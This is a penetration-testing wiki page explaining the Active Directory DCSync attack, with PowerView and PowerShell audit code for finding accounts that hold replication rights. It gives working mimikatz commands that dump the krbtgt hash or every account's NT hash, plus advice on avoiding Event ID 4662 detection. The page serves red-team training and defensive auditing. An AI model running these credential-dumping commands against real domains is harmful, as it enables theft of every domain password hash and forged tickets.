# DCSync

This attack simulates the behavior of a domain controller and asks another domain controller to replicate directory data using the Directory Replication Service Remote Protocol ([MS-DRSR](https://msdn.microsoft.com/en-us/library/cc228086.aspx)), specifically the `IDL_DRSGetNCChanges` request that DCs use among themselves. In short, it lets you impersonate a domain controller and ask for an account's password data (NT hash, Kerberos keys and password history) without touching the DC's disk or LSASS.

This can be used by attackers to get any account's NTLM hash, including that of the KRBTGT account, which enables attackers to forge [Golden Tickets](https://xedex.gitbook.io/internalpentest/active-directory/post-compromise-attacks/golden-tickets).

The only prerequisite to worry about is an account with rights to perform domain replication. These are extended rights granted on the domain object itself (the naming context head, e.g. `DC=fcorp,DC=local`), and by default they are held by Administrators, Domain Admins, Enterprise Admins and the Domain Controllers group. To pull password data an account needs both of the first two rights below; the third is not required for DCSync.

* The “[**Replicating Directory Changes**](https://msdn.microsoft.com/en-us/library/ms684354\(v=vs.85\).aspx)” extended right
  * **CN:** DS-Replication-Get-Changes
  * **GUID:** 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
* The “[**Replicating Directory Changes All**](https://msdn.microsoft.com/en-us/library/ms684355\(v=vs.85\).aspx)” extended right
  * **CN:** DS-Replication-Get-Changes-All
  * **GUID:** 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
* The “[**Replicating Directory Changes In Filtered Set**](https://msdn.microsoft.com/en-us/library/hh338663\(v=vs.85\).aspx)” extended right (this one only covers attributes in the RODC filtered attribute set and is not needed to dump password data; it is listed for completeness, and if you are granting yourself rights it costs nothing to add :)
  * **CN:** DS-Replication-Get-Changes-In-Filtered-Set
  * **GUID:** 89e95b76-444d-4c62-991a-0facbeda640c

Now using PowerView you can check who holds these rights on the domain object by running (in current PowerView the cmdlet is `Get-DomainObjectAcl`; the older name is used here):

```
Get-ObjectAcl -DistinguishedName "dc=fcorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')}
```

`-ResolveGUIDs` translates the `ObjectType` GUIDs into the right names, which is what the `replication-get` match relies on. The `SecurityIdentifier` in the output is a raw SID; resolve it (PowerView's `ConvertFrom-SID`) to see which principal actually holds the right, and remember that `GenericAll` on the domain object implies every extended right.
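The same check without PowerView, as an added example that is not part of the original page: it reads the domain object's ACL through the ActiveDirectory module's `AD:` drive, maps the three GUIDs listed above to their names, and reports which principals hold the Get-Changes and Get-Changes-All pair (or something that implies it, such as GenericAll or an unscoped ExtendedRight ACE). It also flags WriteDacl/WriteOwner, since those do not allow replication directly but let the holder grant the rights to themselves. It assumes RSAT/ActiveDirectory is installed and that the caller can read the domain head's security descriptor; `fcorp.local` is the page's example domain and the function name `Get-DcSyncPrincipals` is ours.

```powershell
# Added example, not from the original page: audit DCSync-relevant rights on the domain head
# using only the ActiveDirectory module. Assumes the module is installed and the caller can read
# the domain object's security descriptor. Deny ACEs are skipped for brevity.
Import-Module ActiveDirectory

# Extended-right GUIDs from the list above, keyed as lowercase strings (System.Guid.ToString() format).
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'Get-Changes-In-Filtered-Set'
}

function Get-DcSyncPrincipals {
    param([string]$Domain = 'fcorp.local')   # fcorp.local is the page's example domain

    $domainDn = (Get-ADDomain -Identity $Domain).DistinguishedName
    $acl      = Get-Acl -Path "AD:\$domainDn"
    $rights   = @{}   # identity -> set of right names found on the domain object

    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        # An InheritOnly ACE applies to child objects, not to the domain object itself.
        if ($ace.PropagationFlags.HasFlag([System.Security.AccessControl.PropagationFlags]::InheritOnly)) { continue }

        $id = $ace.IdentityReference.Value
        if (-not $rights.ContainsKey($id)) { $rights[$id] = New-Object 'System.Collections.Generic.HashSet[string]' }
        $adRights = $ace.ActiveDirectoryRights

        if ($adRights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::GenericAll)) {
            [void]$rights[$id].Add('GenericAll')   # full control includes every extended right
            continue
        }
        # WriteDacl/WriteOwner do not allow replication, but let the holder grant it to themselves.
        if ($adRights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::WriteDacl))  { [void]$rights[$id].Add('WriteDacl') }
        if ($adRights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::WriteOwner)) { [void]$rights[$id].Add('WriteOwner') }

        if ($adRights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight)) {
            if ($ace.ObjectType -eq [guid]::Empty) {
                # ExtendedRight with no ObjectType GUID grants every control access right.
                [void]$rights[$id].Add('AllExtendedRights')
            } else {
                $guid = $ace.ObjectType.ToString()
                if ($ReplicationRights.ContainsKey($guid)) { [void]$rights[$id].Add($ReplicationRights[$guid]) }
            }
        }
    }

    foreach ($id in $rights.Keys) {
        $set = $rights[$id]
        # Dumping password data needs Get-Changes AND Get-Changes-All, or something that implies both.
        $canDcSync = $set.Contains('GenericAll') -or $set.Contains('AllExtendedRights') -or
                     ($set.Contains('Get-Changes') -and $set.Contains('Get-Changes-All'))
        [pscustomobject]@{
            Identity     = $id
            Rights       = ($set | Sort-Object) -join ', '
            CanDCSync    = $canDcSync
            CanGrantSelf = $set.Contains('WriteDacl') -or $set.Contains('WriteOwner')
        }
    }
}

# Anything listed here that is not a Tier 0 group or a domain controller is a finding.
Get-DcSyncPrincipals -Domain 'fcorp.local' |
    Where-Object { $_.CanDCSync -or $_.CanGrantSelf } |
    Format-Table -AutoSize
```

On a default domain the output should be limited to the built-in administrative groups and the domain controller groups; any user, service account or custom group appearing with `CanDCSync` set is either a misconfiguration or a persistence backdoor, and a `CanGrantSelf` entry is one ACL change away from the same thing.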

If you do have the necessary rights, the rest is quite simple. Simply execute the following command in mimikatz (`/domain` is optional when running as a domain user on a domain-joined host; `/dc:` lets you pick a specific domain controller):

```
lsadump::dcsync /domain:<domain FQDN, optional> /user:<account whose password data you want>
FOR EXAMPLE:
lsadump::dcsync /domain:fcorp.local /user:krbtgt
TO DUMP EVERY ACCOUNT IN ONE PASS (ONE LINE PER ACCOUNT WITH ITS NT HASH):
lsadump::dcsync /domain:fcorp.local /all /csv
```

You can also run it from PowerShell with `Invoke-Mimikatz` (part of PowerSploit, not PowerView itself), which loads mimikatz reflectively so nothing touches disk:

```
Invoke-Mimikatz -Command '"lsadump::dcsync /user:fcorp\krbtgt"'
```

Congratz ;)

One caveat before you run it on an engagement: a DCSync is a replication request from something that is not a domain controller, and when Directory Service Access auditing is enabled the targeted DC logs it as Event ID 4662 with the replication GUIDs above in the Properties field. Any defender alerting on that event from a non-DC account will see you, so the krbtgt hash is often worth more than a full `/all` dump.

More details and explanation :

{% embed url="http://www.harmj0y.net/blog/redteaming/abusing-active-directory-permissions-with-powerview/" %}

{% embed url="https://blog.stealthbits.com/extracting-user-password-data-with-mimikatz-dcsync/" %}

{% embed url="https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync" %}
